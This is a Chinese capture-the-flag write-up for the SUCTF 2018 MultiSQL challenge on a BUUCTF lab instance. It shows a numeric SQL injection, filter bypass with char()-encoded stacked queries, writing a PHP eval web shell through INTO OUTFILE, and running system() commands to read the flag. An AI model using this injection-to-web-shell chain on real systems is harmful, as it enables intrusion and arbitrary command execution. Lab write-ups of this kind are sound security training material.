[SUCTF 2018]MultiSQL1

进去题目页面如下

发现可能注入点只有登录和注册,那么我们先注册一个用户,发现跳转到了/user/user.php

查看用户信息,发现有传参/user/user.php?id=1

用?id=1 and 1=1,和?id=1 and 1=2,判断为数字型注入

原本以为是简单的数字型注入,看到大佬说,结果flag不在数据库当中,需要利用注入getshell,链接如下,跟着大佬的方法试一试

BUUCTF:SUCTF 2018MultiSQL-CSDN博客

构造payload

复制代码
http://e025992d-16e2-40f6-88a5-f83aaed92000.node5.buuoj.cn:81/user/user.php?id=2^(if(ascii(mid(user(),1,1))>0,0,1))

通过burp suite的intruder模块进行关键字爆破,看看过滤了哪些关键字

发现过滤了union,select ,&等,故使用char()绕过,语句为

select '<?php eval($_POST_);?>' into outfile '/var/www/html/favicon/shell.php';

可以利用这个工具转换为十进制

文本转十进制-在线免费文本转十进制工具-即时工具

构造payload。getshell

复制代码
http://e025992d-16e2-40f6-88a5-f83aaed92000.node5.buuoj.cn:81/user/user.php?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

最后访问

复制代码
http://e025992d-16e2-40f6-88a5-f83aaed92000.node5.buuoj.cn:81/favicon/shell.php

查看shell,再利用post传参

_system("cd /;ls;echo '<br>';cat WelL_Th1s_14_fl4g");

最后得到flag

相关推荐
技术不好的崎鸣同学19 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
大郭鹏宇20 小时前
MongoDB快速实战与基本原理入门
数据库·mongodb
KASH_SHADOW20 小时前
8-Mysql的安装与配置
数据库·mysql·adb
澈20720 小时前
【无标题】QT入门第十二天:数据库编程(下)模型视图与数据展示 | 零基础学QT
数据库·qt·oracle
normanhere20 小时前
浪潮云国产化超融合规划和部署案例
服务器·网络
云絮.20 小时前
数据库事务
java·开发语言·数据库
Bruce_Liuxiaowei21 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
Leon-Ning Liu21 小时前
【真实经验分享】OGG抽取进程报错 ORA-07445 [kgherrordmp()+986] ORA-00600 [17114]分析步骤
运维·数据库
CCPC不拿奖不改名21 小时前
Redis 工程化部署深度解析
linux·服务器·数据库·redis·深度学习·缓存·rag